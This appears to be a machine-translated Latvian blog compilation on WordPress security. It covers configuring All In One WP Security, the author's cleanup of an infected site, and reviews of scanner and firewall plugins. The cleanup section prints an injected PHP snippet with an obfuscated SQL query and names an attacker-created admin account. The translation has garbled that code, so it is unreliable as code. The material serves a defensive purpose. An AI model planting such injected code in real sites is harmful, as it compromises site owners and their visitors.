Labākais WordPress pretvīrusu spraudnis. Labākie WordPress spraudņi aizsardzībai pret vīrusiem. Papildu ugunsmūra noteikumi

Mani uzlauza. Jūs zināt, piemēram, VKontakte lapa. Bet viņi nelūdza naudu, bet izveidoja daudzas “kreisās” lapas ar saitēm uz dažādām vietnēm. Tad es domāju par sava emuāra aizsardzību. Un es atradu ideālo risinājumu.

Pirmā lieta, ko es izdarīju, bija sazināties ar tehnisko atbalstu ar lūgumu atjaunot manu vietni dienu pirms uzlaušanas, un desmit minūšu laikā man bija mans parastais emuārs.

Pēc tam es instalēju daudzus spraudņus, lai aizsargātu WordPress no uzlaušanas. Bet emuārs sāka šausmīgi palēnināties. Lapas tika ielādētas piecās līdz desmit sekundēs. Tas ir pārāk garš.

Sāku meklēt spraudņus, kas tik ļoti nenoslogo sistēmu. Es lasīju atsauksmes par šiem spraudņiem un arvien biežāk sāku paklupt uz All In One WP Security. Pamatojoties uz aprakstu, man ļoti patika un nolēmu ievietot savā blogā. Un viņš joprojām mani sargā, jo neko labāku neesmu satikusi.

Ko var darīt All In One WP Security (Wordpress aizsardzība viss vienā):
  • Veido datu bāzes, wp-config konfigurācijas faila rezerves kopijas. un .htaccess failu
  • Autorizācijas lapas adreses maiņa
  • Slēpj informāciju par WordPress versiju
  • Administratora aizsardzība - bloķēšana nepareizas autorizācijas dēļ
  • Robotu aizsardzība
  • Un daudzas citas noderīgas lietas

Varu droši teikt, ka All In One WP Security drošības spraudnis ir labākā WordPress vietnes aizsardzība.

Viss vienā WP drošības iestatīšana

Pārejot uz sadaļu Iestatījumi, pirmā lieta, kas jums jādara, ir izveidot rezerves kopijas:

  • datu bāze;
  • wp-config fails;
  • htaccess failu

Tas tiek darīts All In One WP drošības spraudņa iestatīšanas pirmajā lapā.

Pirms darba uzsākšanas izveidojiet dublējumu

Es apskatīšu tikai svarīgākos punktus.

viss vienā wp drošības spraudņa iestatījumi Vadības panelis

Šeit mūs sagaida “Drošības skaitītāja” skaitītājs. Tas parāda vietnes drošības līmeni. Jūsu vietnei ir jāatrodas vismaz zaļajā zonā. Nav nepieciešams dzīties pēc maksimālā līmeņa - nevajadzīgi iestatījumi var traucēt vietnes funkcionalitāti. Sasniedz zelta vidusceļu.


WordPress vietņu aizsardzības skaitītājs

Mainot spraudņa drošības iestatījumus, pie katra vienuma redzēsiet zaļu vairogu ar cipariem — tie ir skaitļi, kas tiek pievienoti kopējam drošības rādītājam.

skaitlis tiek pievienots kopējam drošības rādītājam Iestatījumi WP Version Info cilnei

Atzīmējiet izvēles rūtiņu Dzēst WP ģeneratora metadatus.


WP ģeneratora metadatu noņemšana

Tas tiek darīts, lai kodā netiktu parādīta jūsu instalētā WordPress dzinēja versija. Uzbrucēji zina, kurā versijā ir ievainojamības, un, zinot, kāda WordPress versija ir instalēta jums, varēsiet ātrāk uzlauzt jūsu vietni.

Administratora WP lietotājvārds

Ja jūsu lietotājvārds, lai ievadītu administratora paneli, ir admin, noteikti nomainiet to. Admin ir vispopulārākā pieteikšanās. Daudzas SPS to piedāvā pēc noklusējuma, un cilvēki vienkārši ir pārāk slinki, lai to mainītu.
Uzbrucēji izmanto dažādas programmas, lai uzlauztu vietnes. Šīs programmas atlasa pieteikumvārdus un paroles, līdz atrod piemērotu kombināciju.
Tāpēc neizmantojiet administratora pieteikšanos.

Parādāmais vārds

Ja jūsu segvārds sakrīt ar jūsu pieteikumvārdu, noteikti nomainiet savu pieteikumvārdu vai segvārdu.

Parole

Ja ievadīsiet savu paroli šeit, spraudnis parādīs, cik ilgs laiks būs nepieciešams, lai uzlauztu jūsu vietni.
Ieteikumi paroles stiprināšanai:

  • Parolei jāsastāv no burtiem un cipariem
  • Izmantojiet mazos un lielos burtus
  • Neizmantojiet īsas paroles (vismaz 6 rakstzīmes)
  • Vēlams, lai parolē būtu speciālās rakstzīmes (% # _ * @ $ un detalizētas rakstzīmes)
Paroles sarežģītība Cilne Autorizācija Autorizācijas bloķēšana

Mēs to noteikti ieslēdzam. Ja 5 minūšu laikā kāds 3 reizes nepareizi ievada paroli, IP tiks bloķēta uz 60 minūtēm. Jūs varat ievietot vairāk, bet labāk to nedarīt. Var gadīties, ka jūs pats ievadāt paroli nepareizi un tad gaidāt mēnešus vai pat gadus :)
Atzīmējiet izvēles rūtiņu “Nekavējoties bloķēt nederīgus lietotājvārdus”.
Pieņemsim, ka jūsu pieteikšanās ir hozyainsayta, un, ja kāds ievada citu pieteikumvārdu (piemēram, pieteikšanās), viņa IP adrese tiks automātiski bloķēta.


Autorizācijas bloķēšanas iespējas Automātiska lietotāja atteikšanās

Ieliekam ķeksīti. Ja piesakāties vietnes administratora panelī no cita datora un aizmirstat atteikties no administratora paneļa, pēc noteikta laika sistēma jūs atteiks.
Es iestatīju to uz 1440 minūtēm (tas ir 24 stundas).


Automātiskās lietotāja atteikšanās iespējas Lietotāja reģistrācija Manuāls apstiprinājums

Atzīmējiet “Aktivizēt jaunu reģistrāciju manuālu apstiprināšanu”


Manuāla jaunu CAPTCHA reģistrāciju apstiprināšana reģistrācijas laikā

Ieliekam arī ķeksīti. Tas pārtrauc robota mēģinājumus reģistrēties, jo roboti nevar tikt galā ar captchas.

Reģistrācija Honeypot

Svinēsim. Un mēs neatstājam robotiem nevienu iespēju. Šis iestatījums izveido papildu neredzamu lauku (ievadiet šeit Ievadiet tekstu). Šo lauku var redzēt tikai roboti. Tā kā viņi automātiski aizpilda visus laukus, viņi kaut ko ierakstīs šajā laukā. Sistēma automātiski bloķē tos reģistrācijas mēģinājumus, kuriem ir aizpildīts šis lauks.

Datu bāzes aizsardzība Datu bāzes tabulas prefikss

Ja jūsu vietne pastāv jau ilgu laiku un tajā ir daudz informācijas, datu bāzes prefiksa maiņa jāveic ar vislielāko piesardzību.

noteikti dublējiet savu datu bāzi

Ja tikko izveidojāt savu vietni, varat droši mainīt prefiksu.


Datu bāzes tabulas prefikss Datu bāzes dublēšana

Iespējot automātisku dublējumu izveidi.
Izvēlieties dublējumu izveides biežumu.
Un to failu skaits ar šīm dublējumkopijām, kas tiks saglabāti. Tad viņi sāks pārrakstīt.
Ja vēlaties, lai šie faili tiktu papildus nosūtīti uz jūsu e-pastu, atzīmējiet atbilstošo izvēles rūtiņu. Manā pastkastē šiem nolūkiem tiek sūtītas visas (manu un klientu vietņu) dublējumkopijas.


Dublēšanas iestatījumi Datu bāzes Failu sistēmas aizsardzība

Šeit mēs mainām failu atļaujas, lai viss būtu zaļš.


php failu rediģēšana

Mēs to iestatām, ja nerediģējat failus, izmantojot administratora paneli. Parasti visas izmaiņas failos ir jāveic, izmantojot ftp pārvaldnieka programmas (piemēram, Filezilla). Tātad, ja rodas kāds “avārijs”, jūs vienmēr varat atcelt iepriekšējo darbību.

Mēs liedzam piekļuvi. Ar šo darbību mēs varam paslēpt hakeriem svarīgu informāciju.

Melnais saraksts

Ja jums jau ir IP adreses, kurām vēlaties liegt piekļuvi vietnei, iespējojiet šo opciju.


Lietotāju bloķēšana, izmantojot IP ugunsmūri Ugunsmūra pamatnoteikumi.

Ugunsmūris un ugunsmūris ir programmatūras pakotne, kas filtrē nesankcionētu trafiku.

Šie noteikumi tiek pievienoti .htaccess failam, tāpēc mēs vispirms izveidojam tā dublējumkopiju.

Tagad varat atzīmēt vajadzīgās rūtiņas:


Aktivizējiet galvenās ugunsmūra funkcijas XMLRPC ievainojamības aizsardzība un Pingback WordPress
Bloķējiet piekļuvi vietnei debug.log Papildu ugunsmūra noteikumi

Šajā cilnē atzīmējiet šādas izvēles rūtiņas:

  • Atspējot direktoriju pārlūkošanu
  • Atspējot HTTP izsekošanu
  • Atspējot komentārus, izmantojot starpniekserveri
  • Novērst ļaunprātīgas virknes pieprasījumos (var traucēt citu spraudņu funkcionalitāti)
  • Aktivizējiet rakstzīmju papildu filtrēšanu (Mēs arī rīkojamies piesardzīgi, mums ir jāskatās, kā tas ietekmē vietnes veiktspēju)
      Katram vienumam ir poga “+ Sīkāka informācija”, kurā varat detalizēti izlasīt par katru opciju.
6G melnā saraksta ugunsmūra noteikumi

Mēs atzīmējam abus punktus. Šis ir pārbaudīts noteikumu saraksts, ko spraudnis nodrošina WordPress vietnes drošībai.


Ugunsmūra (ugunsmūra) iestatījumi interneta roboti

Var rasties problēmas ar vietnes indeksēšanu. Es neaktivizēju šo opciju.

Novērst karstās saites

Ieliekam ķeksīti. Lai attēli no jūsu vietnes netiktu rādīti citās vietnēs, izmantojot tiešu saiti. Šī funkcija samazina servera slodzi.

404 noteikšana

Nepareizi ievadot lapas adresi, parādās kļūda 404 (šādas lapas nav). Hakeri ir brutāls spēks, kas cenšas atrast lapas ar ievainojamību un tāpēc īsā laika periodā ievada daudzus neesošus URL.
Šādi uzlaušanas mēģinājumi tiks ievadīti šīs lapas tabulā un, atzīmējot izvēles rūtiņu, jūs varēsiet bloķēt viņu IP adreses uz noteiktu laiku.


404 kļūdu izsekošanas iestatījumi Brute Force Attack Protection

Pēc noklusējuma visām WordPress vietnēm ir viena un tā pati pieteikšanās lapas adrese. Tāpēc uzbrucēji precīzi zina, kur sākt vietnes uzlaušanu.
Šī opcija ļauj mainīt šīs lapas adresi. Šī ir ļoti laba WordPress vietnes aizsardzība. Noteikti mainām adresi. Es neatzīmēju šo izvēles rūtiņu, jo manējā sistēma automātiski mainīja šo lapu manā vietā sistēmas instalēšanas laikā.


Aizsardzība pret brutālu spēku uzbrukumiem, izmantojot sīkfailus

Es neiespējoju šo iestatījumu, jo pastāv iespēja bloķēt sevi, piesakoties no dažādām ierīcēm.

CAPTCHA, lai pieteiktos

Ja jūsu vietnē ir daudz lietotāju vai jums ir tiešsaistes veikals, varat iespējot Captcha, kad piesakāties visos punktos.


Captcha aizsardzība autorizācijas laikā Baltais pieteikšanās saraksts

Vai jūs piesakāties administratora zonā tikai no sava mājas datora un esat vienīgais savas vietnes lietotājs? Pēc tam ievadiet savu IP adresi, un visiem pārējiem tiks liegta piekļuve autorizācijas lapai.

Tas ir smieklīgi, kā dzīvē dažreiz notiek lietas. Es uzgāju foršu kursu par Udemy on modernas metodes vietņu aizsardzība un uzlaušana. Paaugstinot savu prasmju līmeni, es neļāvu savam emuāram inficēties ar vīrusiem. Visticamāk, WordPress lietotāji tā vai citādi ir saskārušies ar simptomiem, kurus aprakstīšu tālāk. Ja nē, tad jums ir paveicies. Es pati esmu ļoti ilgu laiku Es vietnēm neko nepievienoju, domājot par to, kā viņiem tomēr izdevās inficēt savus tīmekļa resursus. Vēl 2014. gadā mani pārsteidza ziņojumi forumos, ka viņu vietne ar izcilu apmeklētāju ir vienkārši inficēta un atņemta.

Un tā, šorīt es saņēmu vēstuli no sava saimnieka, kas mani samulsināja. Jā, es biju patīkami pārsteigts, ka ihc pārrauga vietnes, vai tajās nav ļaunprogrammatūras, taču ziņa, ka viens fails tika mainīts vienas nakts laikā bez manas ziņas un tas ir aizdomas par vīrusu darbību, izraisīja haotiskas emocijas. Patiesībā tas bija apstiprinājums manām aizdomām.

Pirms kāda laika es atklāju, ka metrika satur pārejas uz vietnēm, kuras es vienkārši nevaru iekļaut savos ziņojumos. Kad es mēģināju atrast šīs saites muļķīgi, izmantojot emuāru meklētājprogrammu, es tiku novirzīts uz Apache ar kļūdas ziņojumu. Pat tad, aizdomājoties, ka kaut kas nav kārtībā, es devos meklēšanā. aktīvās tēmas php, kurā es redzēju neskaidru kodu. Tad tas mani iedzina stuporā, bet laika trūkuma dēļ tālāk nerakās. Kā izrādījās, tas bija veltīgi. Galu galā šī bija viena no infekcijas pazīmēm.

Kodētas ļaunprātīgas programmatūras piemērs

Es muļķīgi paļāvos uz rīkiem, lai noteiktu ļaunprātīgu kodu no dažādiem pakalpojumiem, kas piegružo internetu. Viņi visi “priecīgi” mani informēja, ka vieta ir tīra kā rīta rasa.

Iedomājieties paradoksālu situāciju - ir nestrādājoša meklēšanas funkcija, ir neskaidrs PHP kods, lai neveiksmīgais tīmekļa pārzinis neredzētu “dāvanu”, un pretvīrusu pakalpojumi vienkārši klusē.

Bet atgriezīsimies pie mūsu aitām vai, pareizāk sakot, vietnēm. Visās šajās vietnēs man ir divu līmeņu autorizācija. Varbūt tas pasargāja vietni no hakera. Divas dienas pēc search.php inficēšanas manā e-pastā atnāca paziņojums no ihc.ru, ka daži faili ir mainīti un, ja neko nedaru, ieteicams pārbaudīt ar antivīrusu, ko nodrošina pats hostings. Nu, lūk, ir iespēja pārbaudīt šo antivīrusu, žēl, ka mana mīļākā vietne tikko kļuva par testa priekšmetu :)

Testa rezultāts, maigi izsakoties, mani diezgan neizpratnē. Antivīruss pārmeklēja vietni apmēram četrdesmit minūtes un pēc tam nosūtīja savu "spriedumu". 42 faili tika inficēti...

Šis bija laiks saķert galvu, domājot par to, kā kaut kas tāds vispār var notikt. Pats par sevi saprotams, ka notikusi ekspluatācija. Bet vairāk par to vēlāk.

Bija nepieciešams vietni apstrādāt, taču šim nolūkam tā bija rūpīgi jāpārbauda. Jā, to varēja izdarīt daudz vienkāršāk - izmest datu bāzi, pārsūtīt attēlus no wp-content un atkārtoti augšupielādēt to visu tikko instalētajā WordPress dzinējā. Bet “vieglāk” nenozīmē “labāk”. Patiesībā, nezinot, kas tika mainīts, varēja gaidīt, ka caurums parādīsies atkārtoti augšupielādētajā vietnē. Un tad bija pienācis laiks kļūt par jaunizveidoto Šerloku Holmsu, lai veiktu pilnu vietnes auditu.

Ļaunprātīgas programmatūras atrašana ir kā detektīvs

Godīgi sakot, tādu sajūsmu un interesi nebiju jutis jau sen. Jā, mitināšanas antivīruss man ļoti palīdzēja, norādot, kuros failos tika konstatētas izmaiņas. Bet pat viņš nevarēja visu atklāt pilnībā, jo kods mainījās starp apmulsināšanu un banālu heksadecimālo kodēšanu, izmantojot ļaunprātīgu js. Daudz kas bija jādara ar rokām, izmantojot visus trešo pušu rīkus tikai kā palīgus.

Tātad, palaidīsim koda redaktoru un apskatīsim inficētos failus. Faktiski kodā tie “sadeg” diezgan ātri to šifrētā rakstura dēļ. Tomēr tas tā nav visur. Gadījās, ka vajadzēja rindiņu pa rindiņai parsēt php faila kodu un izdomāt, kas tam par vainu. Uzreiz teikšu, ka tas notika ar motīvu failiem. Šajā gadījumā oriģinālie motīvu faili būs ļoti noderīgi salīdzināšanai, ja neesat pārliecināts, kāpēc tieši tā vai cita funkcija ir nepieciešama (un pareizi uzrakstītam vīrusam vajadzētu mantot pēc iespējas mazāk).

Bet paskatīsimies uz visu pēc kārtas. Raksta sākumā jau esmu ievietojis vīrusa apmulsinātā koda ekrānuzņēmumu. Izmantojot resursu https://malwaredecoder.com/, varat to atšifrēt sagremojamā formā un izpētīt. Manā gadījumā dažos failos bija injekcija. Izdzēsīsim to visu ellē.

Tomēr dažreiz jūs varat saskarties ar īsu kodu ar iekļautu. Kā likums, indekss. php un wp-config. php. Diemžēl es neuzņēmu šāda koda ekrānuzņēmumu, jo tajā laikā es neplānoju rakstīt rakstu. No šī koda bija skaidrs, ka tas ir js kodēts kods konkrēta faila izsaukšanai. Lai atšifrētu heksadecimālo kodu, mēs izmantosim pakalpojumu http://ddecode.com/hexdecoder/, ar kuru mēs noteiksim, ka fails tiek izsaukts vietnē wp-includes/Text/Diff/.703f1cf4.ico (es izlaidu pilnu ceļš, būtība ir svarīga) . Vai, jūsuprāt, ir vērts kodēt zvanu uz vienkāršu ikonu failu, kaut arī ar salīdzinoši vienkāršu kodēšanu? Es domāju, ka atbilde ir acīmredzama un atveriet šo "ikonu", izmantojot piezīmju grāmatiņu. Protams, atkal izrādījās, ka tas ir pilnībā kodēts php fails. Izdzēsīsim.

Notīrot acīmredzamos failus, varat pāriet uz ne tik acīmredzamajiem — WordPress motīvu failiem. Šeit apmulsināšana netiek izmantota, jums ir jāizrakās kods. Patiesībā, ja jūs nezināt, ko izstrādātājs sākotnēji bija iecerējis, tad šis uzdevums ir ļoti radošs, lai gan to var atrisināt diezgan ātri. Ja neesat mainījis motīva kodu, ir vieglāk nomainīt inficētos failus (antivīruss tos ir precīzi identificējis) un turpināt darbu. Vai arī varat veikt rakšanas darbus, kā es to darīju, un konstatēt, ka ļoti bieži funkcijai tiek pievienoti šāda veida vīrusi. php absolūti kreisā funkcija, kurā, iespējams, būs kods piekļuvei sql. Manā gadījumā tas izskatās šādi (formatējums nav mainīts):

$sq1="ATLASĪT ATŠĶIRĪGUMA ID, ziņas_nosaukums, ziņas_saturs, ziņas_parole, komentāra_ID, komentāra_ziņas_ID, komentāra_autors, komentāra_datuma_gmt, komentārs_apstiprināts, komentāra_veids, SUBSTRING(komentāra_saturs,1,$src_length) AS com_excerpt $OUTERwINpments>p. ziņas IESLĒGTS ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" A ND post_author=\"li".$sepr."vethe". $comment_types."mes".$sepr."@".$c_is_approved."gm".$comment_auth."ail".$sepr.".".$sepr."co"."m\" UN post_password=\ "\" UN comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";

Mēs jau esam noskaidrojuši, kur šī atlase nonāk. Tāpēc mierīgi paskatāmies, kurā funkcijā ir šis kods un visu šo funkciju izdzēšam – to piešķīrusi ļaunprogrammatūra. Bet, es atkārtoju, ir daudz vieglāk un labāk pārrakstīt visu failu no gatavas tēmas, ja baidāties kaut ko sabojāt.

Pēdējais pieskāriens ir vietnes lietotāju skaita pārbaude. Visas savas vietnes vienmēr esmu vadījis pats. Attiecīgi citu lietotāju nevar un nedrīkst būt. Tomēr, ņemot vērā infekciju, ir viegli uzminēt, ka viņi mēģinās nozagt vietni un izveidot savu lietotāju ar administratora tiesībām. Manā gadījumā izrādījās wp.service.controller.2wXoZ . Izdzēsīsim.

Liels darbs ir paveikts, bet vai ir izplūde? Vēlreiz pārbaudīsim ar antivīrusu, kas ziņo, ka vīrusi vairs nav konstatēti. Tas ir viss, vietne ir izārstēta.

Rezultāti

Kā redzat, vietnes konservēšana ir diezgan vienkārša, lai gan tas ir laikietilpīga. Pēc ārstēšanas ir nepieciešams novērst līdzīgas situācijas nākotnē. Ir jāveic tikai dažas darbības:

  • Atjauniniet pašu WordPress uz jaunākā versija. Iespējams, ka viņi izmantoja novecojuša dzinēja izmantošanu.
  • Izejiet cauri visiem spraudņiem. Noņemiet visus nevajadzīgos (tos, kurus esat iestatījis "nākotnei" un neizmantojat) un pārbaudiet jau strādājošo atbilstību. Tomēr pat spraudņa lejupielāde no WordPress repozitorija negarantē, ka spraudnis būs tīrs. Arvien biežāk ir gadījumi, kad cilvēki iegādājas to vai citu spraudni, pārvērš to par ļaunprogrammatūru, un, atjauninot vietni, jūs sastapsities ar tiem pašiem “priekiem”, kā es. Manā gadījumā es inficējos tieši tāpat.
  • Vienmēr pārbaudiet tēmu. Ja tie ir publiski, atjauniniet tos. Protams, tas ir labāk, ja jūs to iegādājaties tajā pašā veidnēmonster, lai gan tas nenodrošina 100% aizsardzību.
  • Nepalaidiet uzmanību tādiem rīkiem kā Wordfence. Lai gan spraudņa bezmaksas versija ir ļoti, ļoti ierobežota, jūs vismaz zināt, ka jūsu vietne ir kļuvusi aizdomīga.
  • Reizi mēnesī neesiet slinks, lai palaistu vietni, izmantojot wpscan, lai redzētu, kādas ievainojamības tajā ir parādījušās.
  • Pievērsiet uzmanību vietnes saknei. Var būt indekss. html. bak. bak. Tas arī norāda, ka jums ir inficēta vietne (jūs varat nekavējoties rediģēt index.php, tā ir 100% inficēta)
  • Neuzticieties publiskām pretvīrusu vietnēm. Tie maz noder.
  • Es mēģināju izmantot savu piemēru, lai parādītu, kā jūs varat izārstēt WordPress vietni. Vietnē ihc.ru esošais pretvīruss ir vienkārši ļaunprātīgas programmatūras skeneris. Bet viņš arī labi vienkāršoja darbu. Tomēr pat tad, ja jūsu mitināšanai nav šāda pakalpojuma, varat izmantot iepriekš minēto algoritmu, lai identificētu un novērstu infekciju.

    WordPress satura pārvaldības sistēma tās milzīgās popularitātes dēļ piesaista arī nelabvēļus. Turklāt “dzinējs” tiek izplatīts bez maksas, tāpēc tas ir vēl vairāk pakļauts drošības pārkāpumu riskam. WordPress pati par sevi ir diezgan drošs programmatūras produkts. “Caurumi” sāk atvērties, kad lietotājs instalē spraudņus un motīvus.

    Spraudņu un motīvu nedrošība

    Diemžēl jūs ne vienmēr varat būt pārliecināts, ka motīvi vai spraudņi ir droši un nekaitīgi. Viņu maksas versijām ir ļoti specifiski izstrādātāji, kuri novērtē viņu reputāciju. Līdz ar to viņu produkti ir kvalitatīvāki, un iespēja ar tiem saņemt jebkādu ļaunprātīgu kodu ir diezgan zema. Bet, kā liecina mūsu dzīves pieredze, jebkuram noteikumam ir izņēmumi. Daži pievieno pilnīgi nekaitīgu kodu, lai sniegtu atsauksmes, bet citi to dara pilnīgi citiem mērķiem. Pat pašā “dzinējā” dažreiz tiek atklātas ievainojamības, kas ļauj uzbrucējam ievadīt savu kodu tā kodolā.

    Vīrusu aizsardzības spraudņi

    Par laimi, WordPress ir vairāki noderīgi risinājumi, kas var pilnībā skenēt jūsu resursus, lai atrastu visa veida ievainojamības un ļaunprātīgu kodu, un, ja tiek atklāts, norādīt to konkrēto atrašanās vietu vai pilnībā tos neitralizēt. Apskatīsim vairākus diezgan kvalitatīvus un uzticamus spraudņus, lai aizsargātu jūsu WordPress vietni.

    Sucuri drošība

    Bezmaksas spraudnis Sucuri Security ir vadošais drošības rīks, un to izmanto liels skaits WordPress lietotāju. Risinājums nodrošina vietnēm vairākus aizsardzības veidus un līmeņus, tostarp:

    • visu failu skenēšana, lai atrastu ļaunprātīgu kodu;
    • uzraudzīt failu integritāti;
    • visu ar drošību saistīto darbību reģistrēšana;
    • identificēt un paziņot par risku, ka vietne tiks iekļauta ESET, Norton, AVG utt. melnajā sarakstā;
    • noteiktu darbību automātiska izpilde, ja tiek atklāts uzlauzums.
    Wordfence drošība

    Wordfence Security ir risinājums, kas veic tīmekļa resursa padziļinātu skenēšanu, lai atklātu ievainojamības un ļaunprātīgu kodu ne tikai motīvu un spraudņu failos, bet arī pašā dzinēja kodolā.

    Lai pārraudzītu savienojumus, spraudnis izmanto WHOIS pakalpojumus. Pateicoties iebūvētajam ugunsmūrim, tas spēj bloķēt veselus tīklus. Tiklīdz tiek atklāts tīkla uzbrukums, ugunsmūra kārtulu kopa tiek automātiski atjaunināta, lai visefektīvāk cīnītos pret draudiem.

    Antivīruss

    AntiVirus spraudnis katru dienu skenē visus vietnes failus (ieskaitot motīvus, datubāzi) un nosūta e-pasta ziņojumu uz norādīto adresi. Turklāt AntiVirus skenē un notīra pēdas, kad tiek noņemti spraudņi.

    Quttera tīmekļa ļaunprātīgas programmatūras skeneris

    Spēcīgā Quttera Web ļaunprātīgas programmatūras skenera skenēšanas un noteikšanas sarakstā ir iekļautas šādas ievainojamības:

    • ļaunprātīgi skripti;
    • Trojas tārpi;
    • spiegprogrammatūra;
    • aizmugures durvis;
    • izmanto;
    • novirza;
    • ļaunprātīgi iframe;
    • apmulsināšana utt.

    Papildus šim sarakstam spraudnis pārbauda vietnes klātbūtni melnajos sarakstos.

    Drošība pret ļaunprātīgu programmatūru un brutāla spēka ugunsmūris

    Anti-Malware Security un Brute-Force Firewall pievienojumprogramma ir izstrādāta, lai skenētu un neitralizētu pašlaik zināmās ievainojamības, tostarp backdoor skriptus. Spraudņa pretvīrusu datubāzes tiek automātiski atjauninātas, ļaujot atklāt jaunākos vīrusus un izlietojumus. Spraudnim ir iebūvēts ugunsmūris, kas bloķē tīkla draudus.

    Spraudņa īpatnība ir tā, ka tas nodrošina vietnes papildu aizsardzību (aizsardzību pret brutālu spēku un DDoS uzbrukumiem, kā arī WordPress kodola integritātes pārbaudi). Lai to izdarītu, jums vienkārši jāreģistrējas vietnē gotmls.net.

    WP pretvīrusu vietnes aizsardzība

    WP Antivirus Site Protection skenē visus drošībai kritiskos vietņu failus, tostarp motīvus, spraudņus un augšupielādētos failus augšupielādes mapē. Jebkurš atrastais ļaunprātīgais kods vai vīrusi tiks nekavējoties noņemti vai ievietoti karantīnā.

    Exploit Scanner

    Exploit Scanner spraudnis ir paredzēts tikai aizdomīga koda (vietņu failu un datu bāzes) identificēšanai. Tiklīdz kaut kas tiks atklāts, vietnes administrators tiks nekavējoties informēts.

    Centrora WordPress drošība

    Visaptverošais risinājums Centrora WordPress Security ir daudzpusīgs rīks tīmekļa resursa aizsardzībai no visa veida draudiem. Tas ietver šādas funkcijas:

    • meklēt ļaunprātīgu kodu, surogātpastu, SQL injekcijas;
    • ugunsmūra klātbūtne;
    • piekļuves tiesību skenera pieejamība;
    • veicot dublējumu.

    Lūdzu, noklikšķiniet uz vienas no pogām, lai uzzinātu, vai raksts jums patika vai nē.

    Man patīk, man nepatīk

    Krāpnieki var mēģināt uzbrukt vietnei, lai uzlauztu administratora paneli, nozagtu lietotāju paroles, mainītu vietnes kodu, piekļūtu konfidenciālai informācijai, ievietotu slēptās saites vai citādi kaitētu resursam. Šādu uzbrukumu dēļ jūs varat zaudēt klientus, pozīcijas meklēšanas rezultātos, reputāciju vai pat pašu vietni.

    WordPress pati par sevi ir diezgan drošs dzinējs, taču ar elementāru aizsardzību nepietiek.

    Infekciju statistika par 2017. gadu

    Speciālie spraudņi palīdzēs palielināt vietnes drošību, tie nepadarīs vietni pilnīgi neaizsargātu pret jebkādiem uzbrukumiem, bet kavēs uzbrucējus.

    Spraudņi jūsu WordPress vietnes aizsardzībai Viss vienā WP drošība un ugunsmūris

    Spraudnis aizsargā lietotāju kontus, koda failus un padara drošāku pieteikšanos vietnē personīgie konti, veido datu bāzes dublējumkopijas.

    Ko dara spraudnis:

    • pievieno captcha reģistrācijas lapai un vietnes pieteikšanās veidlapai, lai aizsargātu pret surogātpastu;
    • bloķē ieeju lietotājiem ar noteiktu IP uz laiku vai pastāvīgi un dod pagaidu bloķēšanu pēc vairākiem neveiksmīgiem mēģinājumiem iekļūt;
    • ļauj apskatīt lietotāja konta darbību;
    • automātiski veido datu bāzes dublējumus;
    • izveido oriģinālo .htaccess un wp-config.php failu rezerves kopijas;
    • konstatē ievainojamības kontos, piemēram, ar tādu pašu nosaukumu un pieteikumvārdu;
    • ģenerē sarežģītas paroles;
    • atspējo dažu failu rediģēšanu no administratora paneļa, lai aizsargātu PHP kodu;
    • aizver piekļuvi failiem readme.html, licence.txt un wp-config-sample.php;
    • instalē ugunsmūrus, lai aizsargātu pret ļaunprātīgiem skriptiem.



    Spraudņa vadības panelis

    Par spraudņa iestatīšanu ir skaidrs:

    All In One WP Security & Firewall ir tulkots krievu valodā, instalēšana ir bezmaksas.

    Ložu necaurlaidīga drošība

    Spraudnis skenē ļaunprātīgu kodu, aizsargā autorizāciju vietnē, nelaiž cauri surogātpastu un veido rezerves kopijas.

    Ko dara spraudnis:

    • aizsargā wp-config.php, php.ini un php5.ini failus, izmantojot .htaccess failu;
    • ieslēdz tehniskā darba režīmu;
    • pārbauda atļaujas rediģēt mapes un failus administratora panelī;
    • neatļauj surogātpastu, izmantojot funkciju JTC-Lite;
    • automātiski vai manuāli veido rezerves kopijas, nosūta arhīvus pa e-pastu;
    • Uztur kļūdu žurnālus un drošības žurnālu.

    Vairāk par drošības līdzekļiem lasiet spraudņa lapā.


    Ļaunprātīga koda skeneris

    Spraudnis ir tulkots krievu valodā. Tas ir bezmaksas, ir premium versija ar uzlabotu vietņu aizsardzību un uzbrukumu novēršanas iespējām.

    Wordfence drošība

    Aizsargā SPS no uzlaušanas un ļaunprātīgas programmatūras uzbrukumiem, aizsargājot vietnes pieteikšanos, koda izmaiņu skenēšanu, pieteikšanās mēģinājumus un paziņojumus par aizdomīgām darbībām.

    Ko dara spraudnis:

    • salīdzina galvenās tēmas un spraudņus ar to, kas atrodas WordPress.org repozitorijā, un ziņo vietnes īpašniekam par visām neatbilstībām;
    • veic pretvīrusu funkcijas, pārbauda vietni, vai nav ievainojamības;
    • pārbauda, ​​vai ziņojumos un komentāros nav aizdomīga satura un saites.

    IN bezmaksas versija Ir pieejamas arī citas funkcijas.

    Premium versija sniedz nedaudz vairāk:

    • pārbauda, ​​vai vietne vai IP nav iekļauta surogātpasta vai vietņu ar drošības problēmām melnajā sarakstā;
    • ietver divu faktoru autentifikāciju pieteikšanās laikā;
    • sastāda melno sarakstu un bloķē visus pieprasījumus no IP no datu bāzes.

    Vairāk par drošības līdzekļiem lasiet spraudņa lapā.


    Drošības skeneris

    Nav tulkots krievu valodā, pamata versiju var lejupielādēt bez maksas.

    Atspējot XML-RPC Pingback

    Vietne novērš iespējamo XML-RPC ievainojamību, ar kuras palīdzību krāpnieki var uzbrukt citām vietnēm un palēnināt jūsu resursu.

    Ko dara spraudnis:

    • Noņem pingback.ping un pingback.extensions.getPingbacks no XML-RPC saskarnes;
    • noņem X-Pingback no HTTP galvenēm.

    Spraudņa instalēšana

    Spraudnis ieslēgts angļu valoda, uzstādīšana ir bezmaksas.

    iThemes drošība

    Vecais nosaukums ir Labāka WP drošība. Spraudnis aizsargā, piesakoties administratora panelī, un veic pretvīrusu funkcijas.

    Ko dara spraudnis:

    • ietver divu faktoru autentifikāciju, piesakoties administratora panelī;
    • skenē vietnes kodu un brīdina, ja konstatē aizdomīgas izmaiņas;
    • uzrauga vietni, lai atklātu automatizētus uzbrukumus, un bloķē tos;
    • ģenerē sarežģītas paroles;
    • uzrauga lietotāju kontu darbību;
    • iespējo Google reCAPTCHA, ieejot vietnē;
    • ļauj izveidot pagaidu piekļuvi administratora panelī;
    • Ierobežo failu rediģēšanu administratora panelī.

    Vairāk par drošības līdzekļiem lasiet spraudņa lapā.


    Spraudņa iestatījumi

    Tulkots krievu valodā un pieejams bez maksas.

    Sucuri drošība

